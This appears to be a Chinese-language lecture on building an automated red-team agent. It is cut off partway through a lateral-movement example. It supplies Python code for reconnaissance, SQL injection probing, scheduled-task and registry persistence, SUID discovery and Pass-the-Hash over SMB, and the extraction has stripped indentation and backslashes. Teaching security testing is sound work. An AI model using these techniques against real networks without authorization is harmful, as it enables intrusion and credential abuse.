各位同仁、技术爱好者,大家好!
今天,我们齐聚一堂,共同探讨一个前沿且极具挑战性的话题——深入‘网络安全红队 Agent’:如何模拟攻击路径,寻找企业内网资产漏洞,并生成修复建议。在这个数字化飞速发展的时代,企业面临的威胁日益复杂,传统的被动防御已经不足以应对。红队演练作为一种主动、对抗性的安全评估方式,其价值日益凸显。而将红队的部分能力自动化、智能化,构建一个“红队 Agent”,正是我们提升安全效能、降低评估成本、实现持续性安全验证的未来方向。
我将从一个编程专家的视角,为大家剖析这个 Agent 的设计理念、关键技术、实现细节,并辅以大量的代码示例,希望能为大家带来一些启发。
深入理解红队与自动化 Agent 的价值
首先,我们明确“红队”的本质:它模拟真实的攻击者,以目标为导向,通过各种技术手段,渗透到企业的网络深处,发现安全漏洞和薄弱环节。红队的目标不仅仅是发现单个漏洞,更重要的是揭示完整的攻击链条,即攻击者如何从外部突破,逐步横向移动,最终达成其恶意目的。
“红队 Agent”的出现,旨在将红队演练中那些重复性高、逻辑清晰、可编程实现的任务自动化。它不是要取代人类红队专家,而是作为他们的强大辅助工具,甚至在某些场景下,能够独立完成持续性的、大规模的、甚至在人类难以察觉的微观层面进行安全评估。
Agent 的核心价值在于:
- 效率提升: 自动化执行侦察、扫描、漏洞利用等任务,大幅缩短评估周期。
- 覆盖度与深度: 能够以更广的范围和更细致的粒度对目标进行探测,发现人类容易遗漏的盲区。
- 持续性验证: 实现对企业安全状态的常态化监测,及时发现新出现的漏洞和配置偏差。
- 攻击路径可视化: 清晰地呈现攻击者可能利用的每一步骤,帮助企业理解风险的连贯性。
- 量化安全风险: 通过模拟攻击的成功率和对业务影响的评估,为企业提供更具操作性的风险洞察。
红队 Agent 的攻击生命周期与模块设计
一个完整的红队 Agent 需要模拟攻击者从最初的侦察到最终达成目标(如数据窃取、系统控制)的全过程。我们可以将其攻击生命周期划分为以下几个主要阶段,并据此设计 Agent 的模块。
| 攻击阶段 | 主要任务 | Agent 模块功能
侦察模块 (Reconnaissance Module)
侦察是攻击链条的第一步,也是至关重要的一步。Agent 需要收集尽可能多的关于目标企业的信息,包括其网络边界、IP 地址段、域名信息、公开服务、员工信息、技术栈等。
1. 外部侦察 (OSINT – Open Source Intelligence)
Agent 首先从公开渠道收集信息。
目标:
- 域名信息: 注册信息、DNS 记录 (A, MX, NS, SOA, TXT)。
- IP 地址范围: 关联的 IP 地址、CIDR 块、ASN 信息。
- 子域名: 发现被遗忘或未监控的资产。
- 公开端口与服务: 暴露在互联网上的服务。
- 员工信息: 电子邮件地址、社交媒体资料(用于钓鱼攻击准备)。
- 技术栈: Web 服务器类型、框架、CMS 版本。
- 代码泄露: GitHub, Pastebin 等平台上的敏感信息。
Agent 实现方式:
Agent 可以集成各类 OSINT 工具的 API 或通过网页抓取技术实现。
代码示例:Python 进行域名信息和子域名枚举
import requests
import dns.resolver
import json
from concurrent.futures import ThreadPoolExecutor
class OSINT_Agent:
def __init__(self, target_domain):
self.target_domain = target_domain
self.subdomains = set()
self.ips = set()
self.mx_records = []
self.ns_records = []
def get_dns_records(self):
"""
获取主要的DNS记录 (A, MX, NS)
"""
print(f"[*] Querying DNS records for {self.target_domain}...")
try:
# A records
a_records = dns.resolver.resolve(self.target_domain, 'A')
for a in a_records:
self.ips.add(str(a))
print(f" [+] A Record: {str(a)}")
except dns.resolver.NoAnswer:
print(f" [-] No A records found for {self.target_domain}")
except Exception as e:
print(f" [-] Error querying A records: {e}")
try:
# MX records
mx_records = dns.resolver.resolve(self.target_domain, 'MX')
for mx in mx_records:
self.mx_records.append(str(mx.exchange))
print(f" [+] MX Record: {str(mx.exchange)}")
except dns.resolver.NoAnswer:
print(f" [-] No MX records found for {self.target_domain}")
except Exception as e:
print(f" [-] Error querying MX records: {e}")
try:
# NS records
ns_records = dns.resolver.resolve(self.target_domain, 'NS')
for ns in ns_records:
self.ns_records.append(str(ns))
print(f" [+] NS Record: {str(ns)}")
except dns.resolver.NoAnswer:
print(f" [-] No NS records found for {self.target_domain}")
except Exception as e:
print(f" [-] Error querying NS records: {e}")
def find_subdomains_bruteforce(self, wordlist_path="subdomains-top1m.txt", num_threads=10):
"""
通过暴力破解方式枚举子域名
"""
print(f"[*] Brute-forcing subdomains for {self.target_domain} using {wordlist_path}...")
try:
with open(wordlist_path, 'r') as f:
wordlist = [line.strip() for line in f if line.strip()]
def check_subdomain(sub):
full_domain = f"{sub}.{self.target_domain}"
try:
dns.resolver.resolve(full_domain, 'A')
print(f" [+] Found subdomain: {full_domain}")
self.subdomains.add(full_domain)
except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.Timeout):
pass # Not found or timeout
except Exception as e:
# print(f" [-] Error checking {full_domain}: {e}")
pass # Ignore other errors for now
with ThreadPoolExecutor(max_workers=num_threads) as executor:
executor.map(check_subdomain, wordlist)
except FileNotFoundError:
print(f" [-] Wordlist not found at {wordlist_path}")
except Exception as e:
print(f" [-] Error during subdomain brute-force: {e}")
def find_subdomains_certsh(self):
"""
通过 cert.sh API 查找子域名
"""
print(f"[*] Querying cert.sh for subdomains for {self.target_domain}...")
url = f"https://crt.sh/?q=%.{self.target_domain}&output=json"
try:
response = requests.get(url, timeout=10)
response.raise_for_status() # Raise an exception for HTTP errors
data = response.json()
for entry in data:
name_value = entry.get('name_value', '')
# cert.sh might return multiple domains separated by newline
domains = name_value.split('n')
for domain in domains:
if domain.endswith(self.target_domain) and domain != self.target_domain:
self.subdomains.add(domain)
print(f" [+] Found subdomain (cert.sh): {domain}")
except requests.exceptions.RequestException as e:
print(f" [-] Error querying cert.sh: {e}")
except json.JSONDecodeError:
print(f" [-] Failed to decode JSON from cert.sh response.")
except Exception as e:
print(f" [-] An unexpected error occurred with cert.sh: {e}")
def run(self):
self.get_dns_records()
self.find_subdomains_certsh()
# self.find_subdomains_bruteforce() # 如果需要,可以启用暴力破解,但会耗时
print("n--- OSINT Summary ---")
print(f"Target Domain: {self.target_domain}")
print(f"Associated IPs: {', '.join(self.ips) if self.ips else 'N/A'}")
print(f"MX Records: {', '.join(self.mx_records) if self.mx_records else 'N/A'}")
print(f"NS Records: {', '.join(self.ns_records) if self.ns_records else 'N/A'}")
print(f"Discovered Subdomains ({len(self.subdomains)}):")
for sub in sorted(list(self.subdomains)):
print(f" - {sub}")
print("---------------------")
if __name__ == "__main__":
target = "example.com" # 替换为实际目标域名
osint_agent = OSINT_Agent(target)
osint_agent.run()
说明:
- 上述代码利用
dns.resolver库进行 DNS 记录查询。 find_subdomains_bruteforce模拟了子域名暴力破解,需要一个子域名词典文件。find_subdomains_certsh利用crt.sh提供的公共证书透明度日志 API,被动地发现子域名,这种方式更为隐蔽和高效。- Agent 可以将这些信息结构化存储,为后续阶段提供数据。
2. 内部侦察 (Internal Reconnaissance)
一旦 Agent 获得了初始访问权限(可能是通过外部漏洞或钓鱼),它将进入内网进行更深入的侦察。
目标:
- 网络拓扑: 发现内部网络段、VLAN、防火墙规则。
- 活动主机: 识别网络中所有活跃的设备。
- 开放端口与服务: 详细的服务版本、配置信息。
- 用户与组: 域用户、本地用户、组信息、权限分配。
- 共享资源: SMB 共享、NFS 共享、Git 仓库等。
- 域控制器信息: DC 地址、域信任关系。
- Web 应用: 内网 Web 服务、管理界面。
- 安全设备: 识别防火墙、IDS/IPS、EDR 等。
Agent 实现方式:
Agent 将执行以下操作:
- 端口扫描: 发现开放的服务。
- 服务枚举: 识别服务类型和版本。
- 操作系统指纹识别: 确定主机操作系统。
- SMB/LDAP 枚举: 收集域和用户信息。
- 网络流量监听: (在某些受限场景下) 捕获敏感信息。
代码示例:Python 集成 Nmap 进行内网端口扫描和系统识别
Agent 通常不会直接运行 Nmap 二进制,而是通过 Python 库 python-nmap 或者 subprocess 模块调用 Nmap 命令,并解析其 XML 输出。
import nmap
import subprocess
import json
import re
class InternalRecon_Agent:
def __init__(self, target_ips_or_ranges):
self.target_ips = target_ips_or_ranges
self.discovered_hosts = []
self.nm = nmap.PortScanner() # Initialize nmap scanner
def run_nmap_scan(self, ip_range):
"""
执行Nmap扫描并解析结果
"""
print(f"[*] Running Nmap scan on {ip_range}...")
try:
# -sS: SYN scan (stealthy)
# -sV: Service version detection
# -O: OS detection
# -p 1-65535: Scan all ports (can be slow, adjust as needed)
# --script=vuln: Run common vulnerability scripts (advanced, can be noisy)
# -T4: Aggressive timing (faster, but might be detected)
# -oX -: Output in XML to stdout
nmap_command = [
'nmap', '-sS', '-sV', '-O', '-p', '1-1024', # Example: scan common ports
'--min-rate', '100', # min-rate for stealthier scans, adjust
'-T4',
'-oX', '-', ip_range
]
# Execute Nmap via subprocess and capture XML output
process = subprocess.run(nmap_command, capture_output=True, text=True, check=True)
xml_output = process.stdout
# Parse XML output using nmap.PortScanner's built-in parser
# nmap.PortScanner().analyse_nmap_xml_scan(xml_output) is for reading existing XML
# For direct execution and parsing, it's often easier to use the python-nmap wrapper
# Let's re-do this using python-nmap's run method which is cleaner.
# Using python-nmap's built-in run method
self.nm.scan(hosts=ip_range, arguments='-sS -sV -O -p 1-1024 -T4 --min-rate 100')
for host in self.nm.all_hosts():
host_info = {
'ip': host,
'hostname': self.nm[host]['hostnames'][0]['name'] if self.nm[host]['hostnames'] else '',
'state': self.nm[host]['status']['state'],
'os': '',
'ports': []
}
# OS detection
if 'osmatch' in self.nm[host]:
for osmatch in self.nm[host]['osmatch']:
if osmatch['accuracy'] >= '90': # Only take high confidence matches
host_info['os'] = osmatch['name']
break
# Port details
if 'tcp' in self.nm[host]:
for port in self.nm[host]['tcp']:
port_info = self.nm[host]['tcp'][port]
if port_info['state'] == 'open':
host_info['ports'].append({
'port_id': port,
'state': port_info['state'],
'service_name': port_info['name'],
'product': port_info.get('product', ''),
'version': port_info.get('version', ''),
'extrainfo': port_info.get('extrainfo', '')
})
self.discovered_hosts.append(host_info)
print(f" [+] Discovered host: {host_info['ip']} ({host_info['hostname']}) - OS: {host_info['os']}")
for p in host_info['ports']:
print(f" - Port {p['port_id']}/{p['service_name']} ({p['product']} {p['version']})")
except nmap.PortScannerError as e:
print(f" [-] Nmap scan error for {ip_range}: {e}")
except subprocess.CalledProcessError as e:
print(f" [-] Nmap command failed for {ip_range}: {e.stderr}")
except Exception as e:
print(f" [-] An unexpected error occurred during Nmap scan for {ip_range}: {e}")
def enumerate_smb(self, ip):
"""
枚举SMB共享和用户
使用Impacket的smbclient.py或enum4linux等工具的原理
"""
print(f"[*] Enumerating SMB on {ip}...")
# Agent would use a tool like 'smbclient' or 'enum4linux'
# For demonstration, we'll simulate a simple check.
try:
# Example: Check for anonymous SMB login
# command = ['smbclient', '-L', ip, '-N'] # -N for no password
# process = subprocess.run(command, capture_output=True, text=True, timeout=10)
# if "Anonymous login successful" in process.stdout:
# print(f" [+] Anonymous SMB login successful on {ip}. Shares:n{process.stdout}")
# else:
# print(f" [-] Anonymous SMB login failed on {ip}.")
# A more robust agent would use Impacket library directly
# For simplicity, we'll just check if port 445 is open from nmap results
host_info = next((h for h in self.discovered_hosts if h['ip'] == ip), None)
if host_info:
if any(p['port_id'] == '445' and p['state'] == 'open' for p in host_info['ports']):
print(f" [+] SMB (port 445) is open on {ip}. Further enumeration needed.")
# Here, Agent would queue tasks for tools like:
# - Impacket's `smbclient.py` to list shares
# - Impacket's `rpcdump.py` to enumerate users/groups via RPC
# - `CrackMapExec` or `enum4linux` for more advanced enumeration
else:
print(f" [-] SMB (port 445) not open on {ip}.")
else:
print(f" [-] Host {ip} not found in discovered hosts.")
except Exception as e:
print(f" [-] Error enumerating SMB on {ip}: {e}")
def enumerate_ldap_ad(self, ip):
"""
枚举LDAP/AD信息
"""
print(f"[*] Enumerating LDAP/AD on {ip}...")
host_info = next((h for h in self.discovered_hosts if h['ip'] == ip), None)
if host_info and any(p['port_id'] in ['389', '636'] and p['state'] == 'open' for p in host_info['ports']):
print(f" [+] LDAP (port 389/636) is open on {ip}. Further enumeration needed.")
# Agent would queue tasks for tools like:
# - Impacket's `GetUserSPNs.py` to request Service Principal Names
# - Impacket's `GetADUsers.py` to list domain users
# - `BloodHound.py` to collect AD data for graph analysis
else:
print(f" [-] LDAP (port 389/636) not open on {ip}.")
def run(self):
for ip_range in self.target_ips:
self.run_nmap_scan(ip_range)
# After initial scan, iterate through discovered hosts for deeper enumeration
print("n--- Deep Enumeration on Discovered Hosts ---")
for host in self.discovered_hosts:
if host['state'] == 'up':
print(f"nProcessing host: {host['ip']}")
self.enumerate_smb(host['ip'])
self.enumerate_ldap_ad(host['ip'])
# Add more specific service enumeration functions here (e.g., HTTP, SSH, SQL)
print("n--- Internal Recon Summary ---")
print(f"Discovered {len(self.discovered_hosts)} active hosts.")
print(json.dumps(self.discovered_hosts, indent=2))
print("----------------------------")
if __name__ == "__main__":
# 替换为实际的内网IP地址或范围
# 注意: 在实际环境中执行Nmap扫描可能引起告警或被防火墙阻止。
# 确保在授权的测试环境下进行。
internal_target_ips = ["192.168.1.0/24", "10.0.0.10"]
internal_recon_agent = InternalRecon_Agent(internal_target_ips)
internal_recon_agent.run()
说明:
- Agent 可以通过
python-nmap库执行 Nmap 扫描并解析结果。 - 对于 SMB、LDAP 等服务的更深层枚举,Agent 会根据 Nmap 发现的开放端口,调用相应的模块或外部工具(如 Impacket 库的脚本),收集用户、组、共享、域信任等信息。
- 这些收集到的信息是构建攻击路径图的关键数据。
攻击模块 (Attack Module)
在侦察阶段收集到足够的信息后,Agent 将尝试利用这些信息来获得初步访问、提升权限、横向移动。
1. 初步访问 (Initial Access)
这是攻击者进入目标网络的第一个立足点。
Agent 策略:
- 钓鱼攻击模拟: 发送恶意邮件,诱导用户点击链接或打开附件。
- Web 应用漏洞利用: 扫描并利用如 SQL 注入、XSS、文件上传、认证绕过等 Web 漏洞。
- 暴露服务利用: 针对 VPN、RDP、SSH 等暴露在外部的服务进行弱口令尝试或已知漏洞利用。
- 客户端漏洞利用: 针对浏览器、PDF 阅读器等客户端软件的漏洞。
代码示例:Python 模拟简单的 Web 应用漏洞扫描 (SQL 注入)
import requests
class WebVulnerabilityScanner:
def __init__(self, target_url):
self.target_url = target_url
self.vulnerabilities = []
def test_sql_injection(self, payload_file="sql_payloads.txt"):
"""
模拟简单的SQL注入测试
"""
print(f"[*] Testing SQL Injection for {self.target_url}...")
try:
with open(payload_file, 'r') as f:
payloads = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
print(f" [-] SQL Injection payload file not found: {payload_file}")
return
# 假设目标URL有一个参数,例如: http://example.com/index.php?id=1
# 需要 Agent 智能识别参数,这里简化为假定一个参数
if '?' not in self.target_url:
print(" [-] Target URL does not seem to have parameters for SQL injection testing.")
return
base_url, base_params_str = self.target_url.split('?', 1)
base_params = {k: v for k, v in [p.split('=', 1) for p in base_params_str.split('&')]}
test_param = list(base_params.keys())[0] # Take the first parameter for testing
for payload in payloads:
test_params = base_params.copy()
test_params[test_param] += payload # Append payload to existing parameter value
try:
response = requests.get(base_url, params=test_params, timeout=5)
# 常见的SQL错误信息或延迟注入的判断逻辑
if "SQL syntax" in response.text or
"mysql_fetch_array()" in response.text or
"You have an error in your SQL syntax" in response.text or
"ORA-" in response.text: # Oracle error
vuln_info = {
'type': 'SQL Injection',
'url': response.url,
'payload': payload,
'description': 'Potential SQL Injection vulnerability detected.'
}
self.vulnerabilities.append(vuln_info)
print(f" [!] Detected SQL Injection: {vuln_info['url']} with payload '{payload}'")
return # Stop after first detection
# Time-based blind SQLi check (simplified)
# If 'sleep(5)' causes a significant delay, it's a potential vulnerability
# This requires more advanced timing analysis.
except requests.exceptions.RequestException as e:
# print(f" [-] Request error for {base_url} with payload '{payload}': {e}")
pass
except Exception as e:
# print(f" [-] An unexpected error occurred: {e}")
pass
print(f" [+] No obvious SQL Injection found for {self.target_url}.")
def run(self):
self.test_sql_injection()
print("n--- Web Vulnerability Scan Summary ---")
if self.vulnerabilities:
for vuln in self.vulnerabilities:
print(f" - Type: {vuln['type']}")
print(f" URL: {vuln['url']}")
print(f" Payload: {vuln['payload']}")
print(f" Description: {vuln['description']}")
else:
print(" No web vulnerabilities detected.")
print("------------------------------------")
if __name__ == "__main__":
# 创建一个简单的SQL注入payloads文件
with open("sql_payloads.txt", "w") as f:
f.write("' OR 1=1 --n")
f.write("' OR '1'='1n")
f.write("admin' --n")
f.write("'n")
f.write("')n")
# 替换为实际的Web应用URL,需要有可供测试的参数
# 示例: target_web_app_url = "http://testphp.vulnweb.com/listproducts.php?cat=1"
# 或者一个内部 Web 应用: "http://192.168.1.100/search.php?query=test"
target_web_app_url = "http://localhost/vulnerable_app/index.php?id=1" # 假设一个本地易受攻击的Web应用
scanner = WebVulnerabilityScanner(target_web_app_url)
scanner.run()
说明:
- Agent 需要一个预定义的 Payload 列表,或者能够根据目标服务动态生成 Payload。
- 通过分析 HTTP 响应(错误信息、状态码、响应时间等)来判断漏洞是否存在。
- 更高级的 Agent 会集成
sqlmap或Burp Suite的扫描能力。
2. 持久化 (Persistence)
一旦 Agent 获得立足点,它会尝试建立持久化机制,以防被发现或系统重启后失去访问。
Agent 策略:
- 创建后门账户: 在系统上创建新的高权限用户。
- 注册服务/计划任务: 创建恶意服务或计划任务,使其在系统启动时自动运行。
- 修改启动项: 注入恶意代码到注册表启动项或启动脚本。
- DLL 劫持: 替换或修改合法程序的 DLL 文件。
代码示例:Python (通过 PowerShell) 创建 Windows 计划任务实现持久化
import subprocess
class PersistenceAgent:
def __init__(self, target_ip, username, password):
self.target_ip = target_ip
self.username = username
self.password = password
# For remote execution, we'd typically use psexec-like tools or WinRM
# Here, we simulate local execution for simplicity.
# In a real agent, this would be executed on the compromised host.
def create_scheduled_task(self, task_name, command_to_run, schedule_type="DAILY", interval=1):
"""
在Windows上创建计划任务
command_to_run: 例如 "C:\Windows\System32\calc.exe"
"""
print(f"[*] Attempting to create scheduled task '{task_name}' on target...")
# PowerShell command to create a scheduled task
# This assumes we have command execution capabilities on the target.
powershell_command = f"""
$action = New-ScheduledTaskAction -Execute '{command_to_run}'
$trigger = New-ScheduledTaskTrigger -{schedule_type} -At '09:00' -Interval {interval}
Register-ScheduledTask -TaskName '{task_name}' -Action $action -Trigger $trigger -User 'SYSTEM' -Force
"""
try:
# Execute PowerShell command remotely (e.g., via WinRM or psexec if credentials available)
# For demonstration, we'll run it locally.
# In a real agent, this would be encapsulated in a remote execution module.
result = subprocess.run(
["powershell.exe", "-Command", powershell_command],
capture_output=True, text=True, check=True, timeout=30
)
print(f" [+] Scheduled task '{task_name}' created successfully.")
# print(result.stdout)
except subprocess.CalledProcessError as e:
print(f" [-] Failed to create scheduled task '{task_name}': {e.stderr}")
except Exception as e:
print(f" [-] An error occurred: {e}")
def add_startup_registry_key(self, key_name, command_path):
"""
在Windows注册表Run键中添加启动项
"""
print(f"[*] Attempting to add startup registry key '{key_name}' on target...")
# Path for current user: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
# Path for all users: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
# Using HKLM requires administrator privileges.
powershell_command = f"""
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "{key_name}" -Value "{command_path}" -Force
"""
try:
result = subprocess.run(
["powershell.exe", "-Command", powershell_command],
capture_output=True, text=True, check=True, timeout=30
)
print(f" [+] Startup registry key '{key_name}' added successfully.")
# print(result.stdout)
except subprocess.CalledProcessError as e:
print(f" [-] Failed to add startup registry key '{key_name}': {e.stderr}")
except Exception as e:
print(f" [-] An error occurred: {e}")
def run(self):
# Example: Create a task to run calc.exe daily
self.create_scheduled_task("AgentHeartbeat", "C:\Windows\System32\calc.exe")
# Example: Add a startup item to run notepad.exe
self.add_startup_registry_key("AgentNotepad", "C:\Windows\System32\notepad.exe")
if __name__ == "__main__":
# 假设Agent已经获得了目标机器的命令执行权限
# 在真实场景中,这些操作会通过建立的C2通道进行远程执行
persistence_agent = PersistenceAgent("127.0.0.1", "agent_user", "AgentPass123!")
persistence_agent.run()
说明:
- 此示例通过
subprocess调用powershell.exe来执行 Windows 上的持久化操作。 - 在实际的 Agent 中,这些命令会通过已建立的 C2 (Command and Control) 通道,在受控主机上远程执行。
- Agent 需要根据目标操作系统和权限选择合适的持久化技术。
3. 权限提升 (Privilege Escalation)
获得初步访问后,Agent 通常以普通用户权限运行。权限提升的目标是获取更高权限(如 SYSTEM、Administrator 或 root)。
Agent 策略:
- 内核漏洞利用: 发现并利用操作系统内核的已知漏洞。
- 配置错误: 利用不安全的配置文件、不安全的 SUID/GUID 程序(Linux)、服务权限配置错误(Windows)。
- 密码重用/凭据窃取: 窃取内存中的凭据(Mimikatz 模仿)、哈希值,尝试在其他系统上重用。
- 未打补丁的软件: 利用运行在目标系统上的旧版本软件的漏洞。
代码示例:Python (概念性) 检查 Linux SUID/SGID 权限的程序
import os
import subprocess
class PrivilegeEscalationAgent:
def __init__(self, target_ip):
self.target_ip = target_ip
self.potential_privesc_vectors = []
def check_linux_suid_sgid(self):
"""
检查具有SUID/SGID权限的程序,这些程序可能被滥用以提升权限。
这部分代码在受控的Linux机器上执行。
"""
print(f"[*] Checking for SUID/SGID binaries on {self.target_ip}...")
# 查找所有者为root且设置了SUID位的可执行文件
command = "find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null"
try:
result = subprocess.run(command, shell=True, capture_output=True, text=True, check=True, timeout=60)
suid_files = result.stdout.strip().split('n')
if suid_files:
print(f" [+] Found SUID binaries:")
for f in suid_files:
if f:
print(f" - {f}")
self.potential_privesc_vectors.append({
'type': 'SUID Binary Misconfiguration',
'path': f.split()[-1],
'description': 'Binary with SUID bit set, might be exploitable (e.g., GTFOBins).'
})
else:
print(f" [-] No SUID binaries found.")
# 查找所有者为root且设置了SGID位的可执行文件 (类似 SUIG)
command_sgid = "find / -perm -2000 -type f -exec ls -la {} \; 2>/dev/null"
result_sgid = subprocess.run(command_sgid, shell=True, capture_output=True, text=True, check=True, timeout=60)
sgid_files = result_sgid.stdout.strip().split('n')
if sgid_files:
print(f" [+] Found SGID binaries:")
for f in sgid_files:
if f:
print(f" - {f}")
self.potential_privesc_vectors.append({
'type': 'SGID Binary Misconfiguration',
'path': f.split()[-1],
'description': 'Binary with SGID bit set, might be exploitable.'
})
except subprocess.CalledProcessError as e:
print(f" [-] Error checking SUID/SGID: {e.stderr}")
except Exception as e:
print(f" [-] An unexpected error occurred: {e}")
def check_windows_service_permissions(self):
"""
检查Windows服务权限配置,寻找不安全的服务。
这部分代码在受控的Windows机器上执行。
"""
print(f"[*] Checking Windows service permissions on {self.target_ip}...")
# 查找可以由非管理员用户修改的服务
powershell_command = """
Get-WmiObject win32_service | Where-Object {
(Get-Acl "HKLM:\SYSTEM\CurrentControlSet\Services\$($_.Name)").Access | Where-Object {
$_.IdentityReference -like "BUILTIN\Users" -or $_.IdentityReference -like "NT AUTHORITY\Authenticated Users"
}
} | Select-Object Name, DisplayName, PathName, StartMode, State | ConvertTo-Json
"""
try:
result = subprocess.run(
["powershell.exe", "-Command", powershell_command],
capture_output=True, text=True, check=False, timeout=60 # Set check=False to handle no results gracefully
)
if result.returncode == 0 and result.stdout.strip():
services = json.loads(result.stdout)
if services:
print(f" [+] Found potentially insecure Windows services:")
# Convert to list if it's a single object
if not isinstance(services, list):
services = [services]
for service in services:
print(f" - Service: {service['Name']}, Path: {service['PathName']}")
self.potential_privesc_vectors.append({
'type': 'Insecure Service Permissions',
'service_name': service['Name'],
'path': service['PathName'],
'description': 'Service with weak permissions, allowing unprivileged users to modify/restart.'
})
else:
print(f" [-] No insecure Windows service permissions found.")
else:
print(f" [-] PowerShell command for service permissions failed or returned no data. Error: {result.stderr.strip()}")
except json.JSONDecodeError:
print(f" [-] Failed to decode JSON from PowerShell output. Output: {result.stdout.strip()}")
except Exception as e:
print(f" [-] An unexpected error occurred: {e}")
def run(self, os_type="Linux"):
if os_type == "Linux":
self.check_linux_suid_sgid()
elif os_type == "Windows":
self.check_windows_service_permissions()
else:
print(f" [-] Unsupported OS type for privilege escalation checks: {os_type}")
print("n--- Privilege Escalation Scan Summary ---")
if self.potential_privesc_vectors:
for vec in self.potential_privesc_vectors:
print(f" - Type: {vec['type']}")
print(f" Details: {vec.get('path', vec.get('service_name', ''))}")
print(f" Description: {vec['description']}")
else:
print(" No obvious privilege escalation vectors found.")
print("-----------------------------------------")
if __name__ == "__main__":
# 假设 Agent 已经通过 C2 通道在目标机器上获得执行能力
# 根据目标机器的操作系统选择执行
privesc_agent_linux = PrivilegeEscalationAgent("192.168.1.10")
privesc_agent_linux.run(os_type="Linux")
print("n--- Simulating Windows PrivEsc Check ---n")
privesc_agent_windows = PrivilegeEscalationAgent("192.168.1.20")
privesc_agent_windows.run(os_type="Windows")
说明:
- Linux 环境下,Agent 会查找具有 SUID/SGID 权限的二进制文件,这通常是常见的提权点。
- Windows 环境下,Agent 会检查服务权限配置,寻找可由普通用户修改或重启的服务。
- 更完整的 Agent 会集成
PowerSploit、Mimikatz的功能,或利用BloodHound分析 Active Directory 的权限错配。
4. 横向移动 (Lateral Movement)
获得高权限后,Agent 将尝试在网络中进一步扩展控制范围,访问更多主机。
Agent 策略:
- 凭据重用: 利用窃取的凭据(哈希、明文密码)尝试登录其他主机。
- Pass-the-Hash/Ticket: 在不获取明文密码的情况下,利用 NTLM 哈希或 Kerberos 票据进行认证。
- 服务利用: 利用 RDP、SSH、SMB、WinRM 等服务进行远程登录或命令执行。
- 域信任滥用: 利用 Active Directory 的信任关系从一个域渗透到另一个域。
代码示例:Python (概念性) 利用 Impacket 库进行 Pass-the-Hash
Agent 不会自己实现所有协议,而是会调用成熟的库,如 Impacket。
# from impacket.examples.smbclient import SMBClient
# from impacket.examples.psexec import PSEXEC
from impacket.smbconnection import SMBConnection
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import samr
from impacket.dcerpc.v5 import transport
from impacket.ntlm import compute_nthash
import subprocess
import json
class LateralMovementAgent:
def __init__(self, current_host_ip, compromised_credentials):
self.current_host_ip = current_host_ip
self.compromised_credentials = compromised_credentials # {'username': '...', 'password': '...', 'ntlm_hash': '...'}
self.discovered_reachable_hosts = []
self.potential_lateral_paths = []
def scan_for_reachable_hosts(self, ip_range):
"""
在当前网段扫描可达主机,基于Nmap的发现结果。
简化:这里直接使用Nmap的Python wrapper。
"""
print(f"[*] Scanning for reachable hosts in {ip_range} from {self.current_host_ip}...")
nm = nmap.PortScanner()
try:
nm.scan(hosts=ip_range, arguments='-sn') # Ping scan for host discovery
for host in nm.all_hosts():
if nm[host]['status']['state'] == 'up' and host != self.current_host_ip:
self.discovered_reachable_hosts.append(host)
print(f" [+] Discovered reachable host: {host}")
except nmap.PortScannerError as e:
print(f" [-] Nmap scan error: {e}")
except Exception as e:
print(f" [-] An error occurred during host discovery: {e}")
def attempt_pth_smb(self, target_ip, username, ntlm_hash):
"""
尝试使用Pass-the-Hash通过SMB连接到目标。
使用Impacket库的原理。
"""
print(f"[*] Attempting Pass-the-Hash (SMB) to {target_ip} with user {username}...")
try:
# SMBConnection supports NTLM hash for authentication
smb_client = SMBConnection(target_ip, target_ip, None, 445)
smb_client.login(username, '', domain='', lmhash='', nthash=ntlm_hash)
print(f" [+] Successfully authenticated to {target_ip} via SMB using Pass-the-Hash for user {username}!")
self.potential_lateral_paths.append({
'type': 'Pass-the-Hash (SMB)',
'source_host': self.current_host_ip,
'target_host': target_ip,
'credential': username,
'description': f"Achieved SMB access to {target_ip} with compromised NTLM hash."
})
# Here, Agent would then proceed to list shares, upload tools, execute commands via SMBExec/WMIExec
smb_client.logoff()
except Exception as e:
print(f" [-] Failed Pass-the-Hash (SMB) to {target_ip} for user {username}: {e}")
def attempt_psexec(self, target_ip, username, password=None, ntlm_hash=None):
"""
尝试使用PsExec (基于Impacket) 在目标上执行命令。
"""
print(f"[*] Attempting PsExec to {target_ip} with user {username}...")
# Impacket's psexec.py class would be used here.
# For this demonstration, we'll simulate the outcome.
# A real agent would instantiate PSEXEC or similar Impacket classes
# and attempt command execution.
# Example:
# from impacket.examples.psexec import PSEXEC
# psexec = PSEXEC('calc.exe', username, password, domain, hashes=ntlm_hash)
# psexec.run(target_ip)
if password or ntlm_hash:
print(f" [+] PsExec simulated success to {target_ip} for user {username}. (Requires actual Impacket integration)")
self.potential_lateral_paths.append({
'type': 'PsExec (Remote Command Execution)',
'source_host': self.current_host_ip,
'target_host': target_ip,
'credential': username,
'description': f"Achieved remote command execution on {target_ip} using PsExec."
})
else:
print(f" [-] PsExec simulated failure to {target_ip} for user {username}. (No valid credentials)")
def run(self, network_segment):
self.scan_for_reachable_hosts(network_segment)
if not self.compromised_credentials:
print("[-] No compromised credentials available for lateral movement attempts.")
return
username = self.compromised_credentials.get('username')
password = self.compromised_credentials.get('password')
ntlm_hash = self.compromised_credentials.get('ntlm_hash')
if not username:
print("[-] No username provided in compromised credentials.")
return
for target_ip in self.discovered_reachable_hosts:
if ntlm_hash:
self.attempt_pth_smb(target_ip, username, ntlm_hash)
self.attempt_psexec(target_ip, username, ntlm_hash=ntlm_hash) # PsExec also supports hashes
elif password:
self.attempt_psexec(target_ip, username, password=password)
else:
print(f" [-] No suitable credentials (password or NTLM hash) for user {username} to attempt lateral movement.")
print("n--- Lateral Movement Scan Summary ---")
if self.potential_lateral_paths:
for path in self.potential_lateral_paths:
print(f" - Type: {path['type']}")
print(f" Source: {path['source_host']}")
print(f" Target: {path['target_host']}")
print(f" Credential: {path['credential']}")
print(f" Description: {path['description']}")
else:
print(" No lateral movement paths found or successfully exploited.")
print("-----------------------------------")
if __name__ == "__main__":
# 假设Agent在192.168.1.10上,并获得了administrator的NTLM哈希
# 实际应用中,NTLM哈希会通过Mimikatz或其他工具从内存中dump出。
compromised_creds = {
